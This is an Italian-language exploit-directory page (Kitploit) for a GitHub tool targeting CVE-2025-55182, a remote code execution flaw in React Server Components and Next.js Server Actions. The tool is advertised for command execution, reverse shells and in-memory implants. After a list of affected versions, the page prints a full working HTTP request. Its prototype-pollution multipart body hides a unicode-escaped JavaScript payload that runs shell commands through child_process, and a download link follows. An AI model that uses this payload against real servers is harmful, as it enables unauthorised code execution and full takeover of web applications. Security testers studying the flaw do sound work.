Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182 — CVE-2025-55182(esecuzione di comandi, reverse shell, iniezione di memory horse) | Kitploit
Strumenti/GitHubGitHub/bbd-yzz/cve-2025-55182
Generazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHubbbd-yzz/cve-2025-55182

CVE-2025-55182

CVE-2025-55182(esecuzione di comandi, reverse shell, iniezione di memory horse)

Vedi Repository
37 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182

CVE-2025-55182

Vulnerabilità di esecuzione remota di codice nei React Server Components (CVE-2025-55182) e vulnerabilità di esecuzione remota di codice in Next.js (CVE-2025-66478). Questa vulnerabilità interessa principalmente la funzionalità Server Actions di react-server-dom-webpack. A causa della mancanza di controlli di sicurezza nell'analisi dei moduli inviati dal client, un attaccante può costruire una richiesta di modulo malevola per chiamare direttamente i moduli incorporati di Node.js, eseguendo comandi arbitrari sul server, leggendo e scrivendo file arbitrari, e persino assumendo il controllo completo del servizio. Inoltre, poiché Next.js 15.x e 16.x, quando utilizzano l'App Router, dipendono da un pacchetto React server DOM difettoso, l'attaccante può anche iniettare codice malevolo per eseguire comandi remotamente.

Versioni interessate

root@kitploit:~
React versione interessata == 19.0.0
React versione interessata == 19.0.1
React versione interessata == 19.1.0
React versione interessata == 19.2.0
Pacchetto react-server-dom-webpack versione interessata == 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.2.0
Pacchetto react-server-dom-parcel versione interessata == 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.2.0
Pacchetto react-server-dom-turbopack versione interessata == 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.2.0
Next.js versione interessata >= 14.3.0-canary.77
Next.js 15.0.0 <= versione interessata < 15.0.5
Next.js 15.1.0 <= versione interessata < 15.1.9
Next.js 15.2.0 <= versione interessata < 15.2.6
Next.js 15.3.0 <= versione interessata < 15.3.6
Next.js 15.4.0 <= versione interessata < 15.4.8
Next.js 15.5.0 <= versione interessata < 15.5.7
Next.js 16.0.0 <= versione interessata < 16.0.7
Dify 1.1.2 <= versione interessata < 1.10.1-fix.1

Risultati dello strumento

Figura 1 Figura 2 Figura 3 Figura 4

Pacchetto di riproduzione

root@kitploit:~
POST /c9436a490867 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 1755
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=c1dda57f91fbe592e349f3cee2598d970a8089d499e0d896d10cf19752613ddd
Next-Action: x
Connection: close

--c1dda57f91fbe592e349f3cee2598d970a8089d499e0d896d10cf19752613ddd
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"\u0074\u0072\u0079\u0020\u007b\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0073\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u002e\u006d\u0061\u0069\u006e\u004d\u006f\u0064\u0075\u006c\u0065\u002e\u0072\u0065\u0071\u0075\u0069\u0072\u0065\u0028\u0027\u0063\u0068\u0069\u006c\u0064\u005f\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u0027\u0029\u002e\u0065\u0078\u0065\u0063\u0053\u0079\u006e\u0063\u0028\u0027\u0065\u0063\u0068\u006f\u0020\u0051\u0041\u0058\u004e\u0042\u0031\u0032\u0031\u0033\u0038\u0027\u0029\u002e\u0074\u006f\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0027\u0062\u0061\u0073\u0065\u0036\u0034\u0027\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0028\u0065\u0029\u0020\u007b\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0073\u0020\u003d\u0020\u0027\u0045\u0052\u0052\u004f\u0052\u0027\u003b\u0020\u007d\u0020\u0074\u0068\u0072\u006f\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u002e\u0061\u0073\u0073\u0069\u0067\u006e\u0028\u006e\u0065\u0077\u0020\u0045\u0072\u0072\u006f\u0072\u0028\u0027\u0078\u0027\u0029\u002c\u007b\u0064\u0069\u0067\u0065\u0073\u0074\u003a\u0072\u0065\u0073\u007d\u0029\u003b","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
--c1dda57f91fbe592e349f3cee2598d970a8089d499e0d896d10cf19752613ddd
Content-Disposition: form-data; name="1"

"$@0"
--c1dda57f91fbe592e349f3cee2598d970a8089d499e0d896d10cf19752613ddd
Content-Disposition: form-data; name="2"

[]
--c1dda57f91fbe592e349f3cee2598d970a8089d499e0d896d10cf19752613ddd--
Scarica lo strumento